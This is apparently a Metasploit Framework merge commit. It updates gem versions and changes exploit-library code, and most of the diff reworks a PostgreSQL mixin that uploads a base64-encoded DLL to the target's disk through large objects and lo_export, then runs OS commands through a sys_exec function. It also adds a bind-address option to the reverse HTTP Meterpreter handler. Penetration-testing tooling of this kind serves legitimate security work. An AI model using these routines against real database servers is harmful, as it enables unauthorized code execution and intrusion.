Merge branch 'master' into bug/safari-metadata-version

Author: sinn3r

Gemfile

@@ -23,7 +23,7 @@ end
 
 group :test do
   # testing framework
-  gem 'rspec'
+  gem 'rspec', '>= 2.12'
   # code coverage for tests
   # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
   gem 'simplecov', '0.5.4', :require => false

Gemfile.lock

@@ -12,46 +12,46 @@ GIT
 GEM
   remote: http://rubygems.org/
   specs:
-    activemodel (3.2.8)
-      activesupport (= 3.2.8)
+    activemodel (3.2.9)
+      activesupport (= 3.2.9)
       builder (~> 3.0.0)
-    activerecord (3.2.8)
-      activemodel (= 3.2.8)
-      activesupport (= 3.2.8)
+    activerecord (3.2.9)
+      activemodel (= 3.2.9)
+      activesupport (= 3.2.9)
       arel (~> 3.0.2)
       tzinfo (~> 0.3.29)
-    activesupport (3.2.8)
+    activesupport (3.2.9)
       i18n (~> 0.6)
       multi_json (~> 1.0)
     arel (3.0.2)
-    builder (3.0.3)
+    builder (3.0.4)
     coderay (1.0.8)
     diff-lcs (1.1.3)
     i18n (0.6.1)
     method_source (0.8.1)
-    multi_json (1.3.6)
+    multi_json (1.0.4)
     pg (0.14.1)
     pry (0.9.10)
       coderay (~> 1.0.5)
       method_source (~> 0.8)
       slop (~> 3.3.1)
-    rake (0.9.2.2)
-    redcarpet (2.1.1)
-    rspec (2.11.0)
-      rspec-core (~> 2.11.0)
-      rspec-expectations (~> 2.11.0)
-      rspec-mocks (~> 2.11.0)
-    rspec-core (2.11.1)
-    rspec-expectations (2.11.3)
+    rake (10.0.2)
+    redcarpet (2.2.2)
+    rspec (2.12.0)
+      rspec-core (~> 2.12.0)
+      rspec-expectations (~> 2.12.0)
+      rspec-mocks (~> 2.12.0)
+    rspec-core (2.12.1)
+    rspec-expectations (2.12.0)
       diff-lcs (~> 1.1.3)
-    rspec-mocks (2.11.3)
+    rspec-mocks (2.12.0)
     simplecov (0.5.4)
       multi_json (~> 1.0.3)
       simplecov-html (~> 0.5.3)
     simplecov-html (0.5.3)
     slop (3.3.3)
-    tzinfo (0.3.33)
-    yard (0.8.2.1)
+    tzinfo (0.3.35)
+    yard (0.8.3)
 
 PLATFORMS
   ruby
@@ -63,6 +63,6 @@ DEPENDENCIES
   pg (>= 0.11)
   rake
   redcarpet
-  rspec
+  rspec (>= 2.12)
   simplecov (= 0.5.4)
   yard

lib/msf/base/simple/exploit.rb

@@ -69,8 +69,7 @@ def self.exploit_simple(oexploit, opts, &block)
 
 			# Make sure parameters are valid.
 			if (opts['Payload'] == nil)
-				raise MissingPayloadError,
-					"You must specify a payload.", caller
+				raise MissingPayloadError.new, caller
 			end
 
 			# Verify the options
@@ -81,7 +80,7 @@ def self.exploit_simple(oexploit, opts, &block)
 
 			# Initialize the driver instance
 			driver.exploit    = exploit
-			driver.payload    = exploit.framework.modules.create(opts['Payload'])
+			driver.payload    = exploit.framework.payloads.create(opts['Payload'])
 
 			# Set the force wait for session flag if the caller requested force
 			# blocking.  This is so that passive exploits can be blocked on from

lib/msf/core/db_manager.rb

@@ -375,7 +375,6 @@ def update_all_module_details
 		refresh.each  {|md| md.destroy }
 		refresh = nil
 
-		stime = Time.now.to_f
 		[
 			[ 'exploit',   framework.exploits  ],
 			[ 'auxiliary', framework.auxiliary ],

lib/msf/core/exploit/postgres.rb

@@ -1,4 +1,3 @@
-# -*- coding: binary -*-
 require 'msf/core'
 
 module Msf
@@ -12,6 +11,7 @@ module Msf
 module Exploit::Remote::Postgres
 
 	require 'postgres_msf'
+	require 'base64'
 	include Msf::Db::PostgresPR
 	attr_accessor :postgres_conn
 
@@ -53,11 +53,11 @@ def postgres_login(args={})
 		ip = args[:server]         || datastore['RHOST']
 		port = args[:port]         || datastore['RPORT']
 		uri = "tcp://#{ip}:#{port}"
-		
+
 		if Rex::Socket.is_ipv6?(ip)
 			uri = "tcp://[#{ip}]:#{port}"
 		end
-		
+
 		verbose = args[:verbose]   || datastore['VERBOSE']
 		begin
 			self.postgres_conn = Connection.new(db,username,password,uri)
@@ -98,7 +98,6 @@ def postgres_logout
 	def postgres_query(sql=nil,doprint=false)
 		ip = datastore['RHOST']
 		port = datastore['RPORT']
-		verbose = datastore['VERBOSE']
 		postgres_login unless self.postgres_conn
 		unless self.postgres_conn
 			return {:conn_error => true}
@@ -155,18 +154,17 @@ def postgres_print_reply(resp=nil,sql=nil)
 	# postgres_fingerprint attempts to fingerprint a remote Postgresql instance,
 	# inferring version number from the failed authentication messages.
 	def postgres_fingerprint(args={})
-		postgres_logout if self.postgres_conn
+		return postgres_authed_fingerprint if self.postgres_conn
 		db = args[:database]       || datastore['DATABASE']
 		username = args[:username] || datastore['USERNAME']
 		password = args[:password] || datastore['PASSWORD']
 		rhost = args[:server]         || datastore['RHOST']
 		rport = args[:port]         || datastore['RPORT']
-		
+
 		uri = "tcp://#{rhost}:#{rport}"
 		if Rex::Socket.is_ipv6?(rhost)
 			uri = "tcp://[#{rhost}]:#{rport}"
 		end
-		
 
 		verbose = args[:verbose]   || datastore['VERBOSE']
 		begin
@@ -175,11 +173,13 @@ def postgres_fingerprint(args={})
 			version_hash = analyze_auth_error e
 			return version_hash
 		end
-		if self.postgres_conn # Just ask for the version.
-			resp = postgres_query("select version()",false)
-			ver = resp[:complete].rows[0][0]
-			return {:auth => ver}
-		end
+		return postgres_authed_fingerprint if self.postgres_conn
+	end
+
+	def postgres_authed_fingerprint
+		resp = postgres_query("select version()",false)
+		ver = resp[:complete].rows[0][0]
+		return {:auth => ver}
 	end
 
 	# Matches up filename, line number, and routine with a version.
@@ -264,7 +264,7 @@ def postgres_read_textfile(filename)
 		read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT);
 			COPY #{temp_table_name} FROM '#{filename}';
 			SELECT * FROM #{temp_table_name}}
-		read_return = postgres_query(read_query)
+		return postgres_query(read_query,true)
 	end
 
 	def postgres_has_database_privilege(priv)
@@ -291,6 +291,7 @@ def postgres_create_sys_exec(dll)
 	# This presumes the pg_temp.sys_exec() udf has been installed, almost
 	# certainly by postgres_create_sys_exec()
 	def postgres_sys_exec(cmd)
+		print_status "Attempting to Execute: #{cmd}"
 		q = "select pg_temp.sys_exec('#{cmd}')"
 		resp = postgres_query(q)
 		if resp[:sql_error]
@@ -300,10 +301,16 @@ def postgres_sys_exec(cmd)
 		return true
 	end
 
+
 	# Takes a local filename and uploads it into a table as a Base64 encoded string.
 	# Returns an array if successful, false if not.
-	def postgres_upload_binary_file(fname)
-		data = postgres_base64_file(fname)
+	def postgres_upload_binary_file(fname, remote_fname=nil)
+		data = File.read(fname)
+		postgres_upload_binary_data(data, remote_fname)
+	end
+
+	def postgres_upload_binary_data(data, remote_fname=nil)
+		data = postgres_base64_data(data)
 		tbl,fld = postgres_create_stager_table
 		return false unless data && tbl && fld
 		q = "insert into #{tbl}(#{fld}) values('#{data}')"
@@ -312,20 +319,48 @@ def postgres_upload_binary_file(fname)
 			print_error resp[:sql_error]
 			return false
 		end
-		oid, fout = postgres_write_data_to_disk(tbl,fld)
+		oid, fout = postgres_write_data_to_disk(tbl,fld,remote_fname)
 		return false unless oid && fout
 		return [tbl,fld,fout,oid]
 	end
 
 	# Writes b64 data from a table field, decoded, to disk.
-	def postgres_write_data_to_disk(tbl,fld)
+	#
+	# This is accomplished with 3 sql queries:
+	# 1. select lo_create
+	# 2. version dependant:
+	#    - on 9.x, insert into pg_largeobject
+	#    - on older versions, update pg_largeobject
+	# 3. select lo_export to write the file to disk
+	#
+	def postgres_write_data_to_disk(tbl,fld,remote_fname=nil)
 		oid = rand(60000) + 1000
-		fname = Rex::Text::rand_text_alpha(8) + ".dll"
-		queries = [
-			"select lo_create(#{oid})",
-			"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
-			"select lo_export(#{oid}, '#{fname}')"
-		]
+		remote_fname ||= Rex::Text::rand_text_alpha(8) + ".dll"
+
+		ver = postgres_fingerprint
+		case ver[:auth]
+		when /PostgreSQL 9\./
+			# 9.x does *not* insert the largeobject into the table when you do
+			# the lo_create, so we must insert it ourselves.
+			queries = [
+				"select lo_create(#{oid})",
+				"insert into pg_largeobject select #{oid}, 0, decode((select #{fld} from #{tbl}), 'base64')",
+				"select lo_export(#{oid}, '#{remote_fname}')"
+			]
+		else
+			# 8.x inserts the largeobject into the table when you do the
+			# lo_create, so we with a value.
+			#
+			# 7.x is an unknown, but this behavior was the default before the
+			# addition of support for 9.x above, so try it this way and hope
+			# for the best
+			queries = [
+				"select lo_create(#{oid})",
+				"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
+				"select lo_export(#{oid}, '#{remote_fname}')"
+			]
+		end
+
 		queries.each do |q|
 			resp = postgres_query(q)
 			if resp && resp[:sql_error]
@@ -334,15 +369,20 @@ def postgres_write_data_to_disk(tbl,fld)
 				break
 			end
 		end
-		return oid,fname
+		return oid,remote_fname
 	end
 
 	# Base64's a file and returns the data.
 	def postgres_base64_file(fname)
 		data = File.open(fname, "rb") {|f| f.read f.stat.size}
+		postgres_base64_data(data)
+	end
+
+	def postgres_base64_data(data)
 		[data].pack("m*").gsub(/\r?\n/,"")
 	end
 
+
 	# Creates a temporary table to store base64'ed binary data in.
 	def postgres_create_stager_table
 		tbl = Rex::Text.rand_text_alpha(8).downcase

lib/msf/core/handler/reverse_http.rb

@@ -153,7 +153,8 @@ def initialize(info = {})
 				OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', (24*3600*7)]),
 				OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', 300]),
 				OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]),
-				OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ])
+				OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]),
+				OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system'])
 			], Msf::Handler::ReverseHttp)
 	end
 
@@ -176,10 +177,17 @@ def setup_handler
 			comm = nil
 		end
 
+		# Determine where to bind the HTTP(S) server to
+		bindaddrs = ipv6 ? '::' : '0.0.0.0'
+
+		if not datastore['ReverseListenerBindAddress'].to_s.empty?
+			bindaddrs = datastore['ReverseListenerBindAddress']
+		end
+
 		# Start the HTTPS server service on this host/port
 		self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server,
 			datastore['LPORT'].to_i,
-			ipv6 ? '::' : '0.0.0.0',
+			bindaddrs,
 			ssl?,
 			{
 				'Msf'        => framework,